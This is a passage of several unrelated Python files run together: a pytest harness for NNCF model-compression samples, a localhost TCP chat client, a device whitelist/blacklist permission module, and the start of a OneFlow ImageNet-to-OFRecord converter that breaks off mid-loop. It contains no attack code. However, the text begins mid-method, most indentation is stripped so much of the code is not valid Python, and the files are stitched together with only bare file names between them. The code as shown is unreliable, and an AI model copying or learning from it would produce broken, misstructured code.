                print("Error: process is taking too long to complete - terminating, [ " + self.cmd + " ]")
self.kill_process_tree(self.process.pid)
self.exec_time = timeout
self.timeout = True
thread.join()
except OSError as e:
                print(self.process.pid, "Exception when trying to kill task by PID, " + e.strerror)
raise
returncode = self.process.wait()
print("Process returncode = " + str(returncode))
return returncode
def get_execution_time(self):
return self.exec_time
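# Minimal usage sketch (illustrative): running a shell command with a timeout and checking
# its return code. The echoed command is a hypothetical example.
def _example_command_usage():
    runner = Command("echo hello")
    returncode = runner.run(timeout=10)
    assert returncode == 0
    print("took {:.2f}s".format(runner.get_execution_time()))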
class ConfigFactory:
    """Allows modifying the config file before a test run"""
def __init__(self, base_config, config_path):
self.config = base_config
self.config_path = str(config_path)
def serialize(self):
with open(self.config_path, 'w') as f:
json.dump(self.config, f)
return self.config_path
def __getitem__(self, item):
return self.config[item]
def __setitem__(self, key, value):
self.config[key] = value
def create_command_line(args, sample_type):
python_path = PROJECT_ROOT.as_posix()
executable = EXAMPLES_DIR.joinpath(sample_type, 'main.py').as_posix()
cli_args = " ".join(key if val is None else "{} {}".format(key, val) for key, val in args.items())
return "PYTHONPATH={path} {python_exe} {main_py} {args}".format(
path=python_path, main_py=executable, args=cli_args, python_exe=sys.executable
)
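# Minimal usage sketch (illustrative): serializing a tweaked config and building the sample
# command line from it. The config contents here are hypothetical.
def _example_config_factory(tmp_path):
    factory = ConfigFactory({"model": "resnet18"}, tmp_path / "config.json")
    factory["batch_size"] = 32  # modify the config before the test run
    args = {"--mode": "test", "--config": factory.serialize()}
    return create_command_line(args, "classification")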
SAMPLE_TYPES = ["classification", "semantic_segmentation", "object_detection"]
DATASETS = {
"classification": ["cifar10", "cifar100", "cifar10"],
"semantic_segmentation": ["camvid", "camvid"],
"object_detection": ["voc"],
}
CONFIGS = {
"classification": [TEST_ROOT.joinpath("data", "configs", "squeezenet1_1_cifar10_rb_sparsity_int8.json"),
TEST_ROOT.joinpath("data", "configs", "resnet18_cifar100_bin_xnor.json"),
TEST_ROOT.joinpath("data", "configs", "resnet18_cifar10_staged_quant.json")],
"semantic_segmentation": [TEST_ROOT.joinpath("data", "configs", "unet_camvid_int8.json"),
TEST_ROOT.joinpath("data", "configs", "unet_camvid_rb_sparsity.json")],
"object_detection": [TEST_ROOT.joinpath("data", "configs", "ssd300_vgg_voc_int8.json")]
}
BATCHSIZE_PER_GPU = {
"classification": [256, 256, 256],
"semantic_segmentation": [2, 2],
"object_detection": [128],
}
DATASET_PATHS = {
    "classification": {
        # bind x as a default argument so each lambda keeps its own dataset name;
        # without this, late binding would make every lambda use the last value of x
        x: lambda dataset_root, x=x: dataset_root if dataset_root else os.path.join(
            tempfile.gettempdir(), x) for x in DATASETS["classification"]
    },
    "semantic_segmentation": {
        # both semantic segmentation configs use the same mock "camvid" dataset, so a single entry suffices
        DATASETS["semantic_segmentation"][0]: lambda dataset_root: TEST_ROOT.joinpath("data", "mock_datasets",
                                                                                      "camvid"),
    },
"object_detection": {
DATASETS["object_detection"][0]: lambda dataset_root: TEST_ROOT.joinpath("data", "mock_datasets", "voc")
},
}
CONFIG_PARAMS = list()
for sample_type in SAMPLE_TYPES:
for tpl in list(zip(CONFIGS[sample_type], DATASETS[sample_type], BATCHSIZE_PER_GPU[sample_type])):
CONFIG_PARAMS.append((sample_type,) + tpl)
@pytest.fixture(params=CONFIG_PARAMS,
ids=["-".join([p[0], p[1].name, p[2], str(p[3])]) for p in CONFIG_PARAMS])
def config(request, dataset_dir):
sample_type, config_path, dataset_name, batch_size = request.param
dataset_path = DATASET_PATHS[sample_type][dataset_name](dataset_dir)
with config_path.open() as f:
jconfig = json.load(f)
if "checkpoint_save_dir" in jconfig.keys():
del jconfig["checkpoint_save_dir"]
jconfig["dataset"] = dataset_name
return {
"sample_type": sample_type,
'nncf_config': jconfig,
"model_name": jconfig["model"],
"dataset_path": dataset_path,
"batch_size": batch_size,
}
@pytest.fixture(scope="module")
def case_common_dirs(tmp_path_factory):
return {
"checkpoint_save_dir": str(tmp_path_factory.mktemp("models"))
}
@pytest.mark.parametrize("multiprocessing_distributed",
                         (True, False),
                         ids=['distributed', 'dataparallel'])
def test_pretrained_model_eval(config, tmp_path, multiprocessing_distributed):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--mode": "test",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
@pytest.mark.parametrize(
    "multiprocessing_distributed", [
        pytest.param(True, marks=pytest.mark.dependency(name="train_distributed")),
        pytest.param(False, marks=pytest.mark.dependency(name="train_dataparallel"))],
ids=['distributed', 'dataparallel'])
def test_pretrained_model_train(config, tmp_path, multiprocessing_distributed, case_common_dirs):
checkpoint_save_dir = os.path.join(case_common_dirs["checkpoint_save_dir"],
"distributed" if multiprocessing_distributed else "data_parallel")
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--mode": "train",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 1,
"--checkpoint-save-dir": checkpoint_save_dir,
"--dist-url": "tcp://127.0.0.1:8989"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
last_checkpoint_path = os.path.join(checkpoint_save_dir, get_name(config_factory.config) + "_last.pth")
assert os.path.exists(last_checkpoint_path)
assert torch.load(last_checkpoint_path)['compression_level'] in (CompressionLevel.FULL, CompressionLevel.PARTIAL)
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_trained_model_eval(config, tmp_path, multiprocessing_distributed, case_common_dirs):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = os.path.join(case_common_dirs["checkpoint_save_dir"],
"distributed" if multiprocessing_distributed else "data_parallel",
get_name(config_factory.config) + "_last.pth")
args = {
"--mode": "test",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--weights": ckpt_path,
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
def get_resuming_checkpoint_path(config_factory, multiprocessing_distributed, checkpoint_save_dir):
return os.path.join(checkpoint_save_dir,
"distributed" if multiprocessing_distributed else "data_parallel",
get_name(config_factory.config) + "_last.pth")
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_resume(config, tmp_path, multiprocessing_distributed, case_common_dirs):
checkpoint_save_dir = os.path.join(str(tmp_path), "models")
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = get_resuming_checkpoint_path(config_factory, multiprocessing_distributed,
case_common_dirs["checkpoint_save_dir"])
if "max_iter" in config_factory.config:
config_factory.config["max_iter"] += 2
args = {
"--mode": "train",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 2,
"--checkpoint-save-dir": checkpoint_save_dir,
"--resume": ckpt_path,
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
last_checkpoint_path = os.path.join(checkpoint_save_dir, get_name(config_factory.config) + "_last.pth")
assert os.path.exists(last_checkpoint_path)
assert torch.load(last_checkpoint_path)['compression_level'] in (CompressionLevel.FULL, CompressionLevel.PARTIAL)
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_export_with_resume(config, tmp_path, multiprocessing_distributed, case_common_dirs):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = get_resuming_checkpoint_path(config_factory, multiprocessing_distributed,
case_common_dirs["checkpoint_save_dir"])
onnx_path = os.path.join(str(tmp_path), "model.onnx")
args = {
"--mode": "test",
"--config": config_factory.serialize(),
"--resume": ckpt_path,
"--to-onnx": onnx_path
}
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
assert os.path.exists(onnx_path)
def test_export_with_pretrained(tmp_path):
config = SampleConfig()
config.update({
"model": "resnet18",
"dataset": "imagenet",
"input_info": {
"sample_size": [2, 3, 299, 299]
},
"num_classes": 1000,
"compression": {"algorithm": "magnitude_sparsity"}
})
config_factory = ConfigFactory(config, tmp_path / 'config.json')
onnx_path = os.path.join(str(tmp_path), "model.onnx")
args = {
"--mode": "test",
"--config": config_factory.serialize(),
"--pretrained": '',
"--to-onnx": onnx_path
}
runner = Command(create_command_line(args, "classification"))
res = runner.run()
assert res == 0
assert os.path.exists(onnx_path)
@pytest.mark.parametrize(('algo', 'ref_weight_decay'),
(('rb_sparsity', 0),
('const_sparsity', 1e-4),
('magnitude_sparsity', 1e-4),
('quantization', 1e-4)))
def test_get_default_weight_decay(algo, ref_weight_decay):
config = NNCFConfig()
config.update({"compression": {"algorithm": algo}})
assert ref_weight_decay == get_default_weight_decay(config)
def test_cpu_only_mode_produces_cpu_only_model(config, tmp_path, mocker):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 1,
"--cpu-only": None
}
command_line = " ".join(key if val is None else "{} {}".format(key, val) for key, val in args.items())
if config["sample_type"] == "classification":
import examples.classification.main as sample
if is_staged_quantization(config['nncf_config']):
mocker.patch("examples.classification.staged_quantization_worker.train_epoch_staged")
mocker.patch("examples.classification.staged_quantization_worker.validate")
import examples.classification.staged_quantization_worker as staged_worker
staged_worker.validate.return_value = (0, 0)
else:
mocker.patch("examples.classification.main.train_epoch")
mocker.patch("examples.classification.main.validate")
sample.validate.return_value = (0, 0)
elif config["sample_type"] == "semantic_segmentation":
import examples.semantic_segmentation.main as sample
import examples.semantic_segmentation.train
mocker.spy(examples.semantic_segmentation.train.Train, "__init__")
elif config["sample_type"] == "object_detection":
import examples.object_detection.main as sample
mocker.patch("examples.object_detection.main.train")
sample.main(shlex.split(command_line))
# pylint: disable=no-member
if config["sample_type"] == "classification":
if is_staged_quantization(config['nncf_config']):
import examples.classification.staged_quantization_worker as staged_worker
model_to_be_trained = staged_worker.train_epoch_staged.call_args[0][2] # model
else:
model_to_be_trained = sample.train_epoch.call_args[0][1] # model
elif config["sample_type"] == "semantic_segmentation":
model_to_be_trained = examples.semantic_segmentation.train.Train.__init__.call_args[0][1] # model
elif config["sample_type"] == "object_detection":
model_to_be_trained = sample.train.call_args[0][0] # net
for p in model_to_be_trained.parameters():
assert not p.is_cuda
class SampleType(Enum):
CLASSIFICATION = auto()
SEMANTIC_SEGMENTATION = auto()
OBJECT_DETECTION = auto()
class TestCaseDescriptor:
config_name: str
config_path: Path
sample_type: SampleType
dataset_dir: Path
dataset_name: str
is_real_dataset: bool = False
batch_size: int
num_weights_to_init: int
def batch(self, batch_size: int):
self.batch_size = batch_size
return self
def config(self, config_name: str):
self.config_path = TEST_ROOT.joinpath("data", "configs", "hawq", config_name)
self.config_name = config_name
return self
def sample(self, sample_type: SampleType):
self.sample_type = sample_type
return self
def real_dataset(self, dataset_name: str):
self.dataset_name = dataset_name
self.is_real_dataset = True
return self
def mock_dataset(self, dataset_name: str):
self.dataset_dir = TEST_ROOT.joinpath("data", "mock_datasets", dataset_name)
return self
def num_weights(self, n: int):
self.num_weights_to_init = n
return self
    def __str__(self):
        return self.config_name
TEST_CASE_DESCRIPTORS = [
TestCaseDescriptor().
config("inception_v3_cifar10_mixed_int.json").
sample(SampleType.CLASSIFICATION).real_dataset('cifar10').batch(2).num_weights(96),
TestCaseDescriptor().
config("inception_v3_cifar10_mixed_int_staged.json").
sample(SampleType.CLASSIFICATION).real_dataset('cifar10').batch(2).num_weights(96),
TestCaseDescriptor().
config("resnet18_cifar10_mixed_int.json").
sample(SampleType.CLASSIFICATION).real_dataset('cifar10').batch(2).num_weights(20),
TestCaseDescriptor().
config("resnet18_cifar10_mixed_int_staged.json").
sample(SampleType.CLASSIFICATION).real_dataset('cifar10').batch(2).num_weights(20),
TestCaseDescriptor().
config("ssd300_vgg_voc_mixed_int.json").
sample(SampleType.OBJECT_DETECTION).mock_dataset('voc').batch(2).num_weights(35),
TestCaseDescriptor().
config("unet_camvid_mixed_int.json").
sample(SampleType.SEMANTIC_SEGMENTATION).mock_dataset('camvid').batch(2).num_weights(23),
TestCaseDescriptor().
config("icnet_camvid_mixed_int.json").
sample(SampleType.SEMANTIC_SEGMENTATION).mock_dataset('camvid').batch(2).num_weights(66)
]
@pytest.fixture(params=TEST_CASE_DESCRIPTORS, ids=[str(d) for d in TEST_CASE_DESCRIPTORS])
def hawq_config(request, dataset_dir):
desc: TestCaseDescriptor = request.param
if desc.is_real_dataset:
desc.dataset_dir = Path(
dataset_dir if dataset_dir else os.path.join(tempfile.gettempdir(), desc.dataset_name))
return desc
def test_hawq_init(hawq_config, tmp_path, mocker):
args = {
"--data": str(hawq_config.dataset_dir),
"--config": str(hawq_config.config_path),
"--log-dir": tmp_path,
"--batch-size": hawq_config.batch_size,
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
}
command_line = " ".join(f'{key} {val}' for key, val in args.items())
if hawq_config.sample_type == SampleType.CLASSIFICATION:
import examples.classification.main as sample
mocker.patch("examples.classification.staged_quantization_worker.train_staged")
mocker.patch("examples.classification.main.train")
elif hawq_config.sample_type == SampleType.SEMANTIC_SEGMENTATION:
import examples.semantic_segmentation.main as sample
mocker.patch("examples.semantic_segmentation.main.train")
elif hawq_config.sample_type == SampleType.OBJECT_DETECTION:
import examples.object_detection.main as sample
mocker.patch("examples.object_detection.main.train")
from nncf.quantization.init_precision import HAWQPrecisionInitializer
set_chosen_config_spy = mocker.spy(HAWQPrecisionInitializer, "set_chosen_config")
sample.main(shlex.split(command_line))
bitwidth_list = set_chosen_config_spy.call_args[0][1]
assert len(bitwidth_list) == hawq_config.num_weights_to_init
assert 4 in bitwidth_list
assert 8 in bitwidth_list
tcp_chat_client.py
# -*- coding:utf8 -*-
# python3
import socket
import threading

HOST = '127.0.0.1'
PORT = 5000
ADDR = (HOST, PORT)
BUFSIZ = 1024

tcp_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client.connect(ADDR)
def send_message():
while True:
input_data = input(">>> ")
if not input_data:
break
tcp_client.send(bytes(input_data, 'utf8'))
tcp_client.close()
def recv_message():
    while True:
        get_data = tcp_client.recv(BUFSIZ)
        if not get_data:  # an empty read means the server closed the connection
            break
        print(get_data.decode('utf8'))
if __name__ == '__main__':
    # the receiver runs as a daemon thread so the process can exit once the send loop ends
    recv_threading = threading.Thread(target=recv_message, daemon=True)
    recv_threading.start()
    send_threading = threading.Thread(target=send_message)
    send_threading.start()
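# Hypothetical counterpart for local testing (not part of the original client): a minimal
# TCP echo server bound to the same HOST/PORT, serving a single client.
def run_echo_server(host='127.0.0.1', port=5000):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, port))
    server.listen(1)
    conn, _addr = server.accept()
    while True:
        data = conn.recv(1024)
        if not data:  # client closed the connection
            break
        conn.sendall(data)  # echo the message back
    conn.close()
    server.close()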
permission.py
import os
import time
import threading
import uuid
import PySimpleGUI as sg
prompt_open = False
user_response = ""
permission_tokens = []
TOKEN_TIMEOUT_S = 60
def is_device_allowed(current_setting, device_id, device_name, token):
if current_setting == 1: # allow all
return 1
if current_setting == 2: # block all
return -1
if is_device_in_list(device_id, "whitelist.txt"):
return 1
if is_device_in_list(device_id, "blacklist.txt"):
return -1
if token in permission_tokens:
permission_tokens.remove(token)
return 1
return 0 # client needs to request permission
def is_device_in_list(device_id, filename):
if not os.path.isfile(filename):
return False
with open(filename, "r") as f:
for line in f.readlines():
if line[:-1] == device_id: # remove \n for comparison
return True
return False
def add_device_to_list(device_id, filename):
if not os.path.isfile(filename):
with open(filename, "w+") as f:
f.write("# File must end with an empty line")
f.write("\n")
with open(filename, "a+") as f:
f.write(device_id)
f.write("\n")
def set_user_response(val):
global user_response, prompt_open
user_response = val
prompt_open = False
def create_single_match_token():
token = uuid.uuid4().hex
global permission_tokens
permission_tokens.append(token)
t_token = threading.Thread(target=set_token_timeout, args=(token, ))
t_token.start()
return token
# remove the token after a certain amount of time has passed
def set_token_timeout(token):
global permission_tokens
time.sleep(TOKEN_TIMEOUT_S)
try:
permission_tokens.remove(token)
except ValueError:
pass
def request_permission_for_device(device_id, device_name, queue):
    global prompt_open
    if prompt_open:  # prevent multiple popups
        return ""
    prompt_open = True  # mark the prompt as open until a response arrives
    user_input = ""
    # put a command into the queue; it will be picked up by the App
    queue.put_nowait(
        ("permission_request", (device_name, device_id))
    )
    # Wait for a response: only consume the head of the queue once it is a
    # "permission_response"; other items are left in place for their own consumers.
    while True:
        if queue.empty():
            time.sleep(0.05)  # brief pause to avoid a tight busy-wait
            continue
        # prevent going out of range when another thread pops the item at indexing time
        try:
            last_item_key = queue.queue[0][0]
        except IndexError:
            continue
if last_item_key == "permission_response":
item = queue.get_nowait()
user_input = item[1]
break
# white-/blacklist if necessary
if user_input == "allow":
add_device_to_list(device_id, "whitelist.txt")
elif user_input == "block":
add_device_to_list(device_id, "blacklist.txt")
prompt_open = False
return user_input
def on_permission_response(device_id, user_input):
    # device_id is taken as a parameter; it is not available as a global in this module
    if user_input == "allow":
        add_device_to_list(device_id, "whitelist.txt")
    elif user_input == "block":
        add_device_to_list(device_id, "blacklist.txt")
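# Minimal flow sketch (illustrative): how a caller might combine the token helpers with
# is_device_allowed. The setting values (1 = allow all, 2 = block all, anything else =
# consult lists/tokens) follow the checks above; the device id and name are hypothetical.
def _example_permission_flow():
    token = create_single_match_token()  # single-use token, valid for TOKEN_TIMEOUT_S seconds
    verdict = is_device_allowed(current_setting=0, device_id="dev-1234",
                                device_name="Example Phone", token=token)
    return verdict  # 1 -> allowed, -1 -> blocked, 0 -> client must request permission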
imagenet_ofrecord.py
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to OFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
train_directory/part-00000
train_directory/part-00001
...
train_directory/part-01023
and
validation_directory/part-00000
validation_directory/part-00001
...
validation_directory/part-01023
Each record within the OFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
"""
from datetime import datetime
import os
import random
import sys
import threading
import re
import argparse
import glob
import numpy as np
import six
import cv2
import oneflow.core.record.record_pb2 as of_record
import struct
"""
# train dataset to ofrecord
python3 imagenet_ofrecord.py \
--train_directory data/imagenet/train \
--output_directory data/imagenet/ofrecord/train \
--label_file imagenet_lsvrc_2015_synsets.txt \
--shards 1024 --num_threads 8 --name train \
--bounding_box_file imagenet_2012_bounding_boxes.csv \
--height 224 --width 224
# val dataset to ofrecord
python3 imagenet_ofrecord.py \
--validation_directory data/imagenet/validation \
--output_directory data/imagenet/ofrecord/validation \
--label_file imagenet_lsvrc_2015_synsets.txt \
--shards 32 --num_threads 4 --name validation \
--bounding_box_file imagenet_2012_bounding_boxes.csv \
--height 224 --width 224
"""
arg_parser = argparse.ArgumentParser(
    description='Convert ImageNet images to OFRecord files, optionally resizing them.')
arg_parser.add_argument('--resize', dest='resize', default=False, help='resize image')
arg_parser.add_argument('--name', dest='name', default='train',
                        help='data_file_type')
arg_parser.add_argument('--width', dest='width', default=0,
                        type=int, help='fixed image width')
arg_parser.add_argument('--height', dest='height', default=0,
                        type=int, help='fixed image height')
arg_parser.add_argument('--train_directory', dest='train_directory',
                        default='/tmp/', help='Training data directory')
arg_parser.add_argument('--validation_directory', dest='validation_directory',
                        default='/tmp/', help='Validation data directory')
arg_parser.add_argument('--output_directory', dest='output_directory',
                        default='/tmp/', help='Output data directory')
arg_parser.add_argument('--shards', dest='shards',
                        default=1024, type=int, help='Number of shards in making OFRecord files.')
arg_parser.add_argument('--num_threads', dest='num_threads', default=8,
                        type=int, help='Number of threads to preprocess the images.')
# The labels file contains the list of valid labels, one per line.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
arg_parser.add_argument('--label_file', dest='labels_file',
default='imagenet_lsvrc_2015_synsets.txt', help='Labels file')
# This file contains the mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
arg_parser.add_argument('--imagenet_metadata_file', dest='imagenet_metadata_file',
default='imagenet_metadata.txt', help='ImageNet metadata file')
# This file is the output of process_bounding_boxes.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
arg_parser.add_argument('--bounding_box_file', dest='bounding_box_file',
default='./imagenet_2012_bounding_boxes.csv', help='Bounding box file')
ARGS = arg_parser.parse_args()
def _int32_feature(value):
"""Wrapper for inserting int32 features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(int32_list=of_record.Int32List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(float_list=of_record.FloatList(value=value))
def _double_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(double_list=of_record.DoubleList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
# if isinstance(value, six.string_types):
# value = six.binary_type(value, encoding='utf-8')
return of_record.Feature(bytes_list=of_record.BytesList(value=[value]))
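# For example, _int32_feature(224) wraps the value as
# of_record.Feature(int32_list=of_record.Int32List(value=[224])), and
# _bytes_feature expects bytes, hence the .encode('utf-8') calls below.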
def _convert_to_example(filename, image_buffer, label, index, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
index: integer, unique per-image id stored as the record's data_id
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of floats
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
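# Distribute each box's [xmin, ymin, xmax, ymax] into the four
# per-coordinate lists, since the proto stores one list per coordinate.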
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = of_record.OFRecord(feature={
'data_id': _bytes_feature(str(index).encode('utf-8')),
'height': _int32_feature(height),
'width': _int32_feature(width),
'colorspace': _bytes_feature(colorspace.encode('utf-8')),
'channels': _int32_feature(channels),
'class/label': _int32_feature(label),
'class/synset': _bytes_feature(synset.encode('utf-8')),
'class/text': _bytes_feature(human.encode('utf-8')),
'object/bbox/xmin': _float_feature(xmin),
'object/bbox/xmax': _float_feature(xmax),
'object/bbox/ymin': _float_feature(ymin),
'object/bbox/ymax': _float_feature(ymax),
'object/bbox/label': _int32_feature([label] * len(xmin)),
'format': _bytes_feature(image_format.encode('utf-8')),
'filename': _bytes_feature(os.path.basename(filename).encode('utf-8')),
'encoded': _bytes_feature(image_buffer)})
return example
class ImageCoder(object):
"""Helper class that provides image coding utilities."""
def __init__(self, size=None):
self.size = size
def _resize(self, image_data):
# self.size is (width, height); image_data.shape[:2] is (height, width).
if self.size is not None and image_data.shape[:2] != self.size[::-1]:
return cv2.resize(image_data, self.size)
return image_data
def image_to_jpeg(self, image_data, resize=ARGS.resize):
# cv2.imdecode returns a NumPy array in BGR channel order.
# (np.fromstring is deprecated, hence np.frombuffer.)
image_data = cv2.imdecode(np.frombuffer(image_data, np.uint8), 1)
if resize:
image_data = self._resize(image_data)
return cv2.imencode(".jpg", image_data)[1].tobytes(), image_data.shape[0], image_data.shape[1]
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the raw image bytes.
with open(filename, 'rb') as f:
image_data = f.read()
# Re-encode (and optionally resize) as JPEG.
image_data, height, width = coder.image_to_jpeg(image_data)
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, indexs, humans, bboxes, num_shards):
"""Processes and saves list of images as OFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide image coding utils.
thread_index: integer, unique thread index within [0, len(ranges)).
ranges: list of pairs of integers specifying the range of images each
thread analyzes in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
indexs: list of integers; per-image unique ids stored as data_id
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
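# e.g. for ranges[thread_index] = [0, 1000] and 4 shards per thread,
# shard_ranges == [0, 250, 500, 750, 1000].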
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
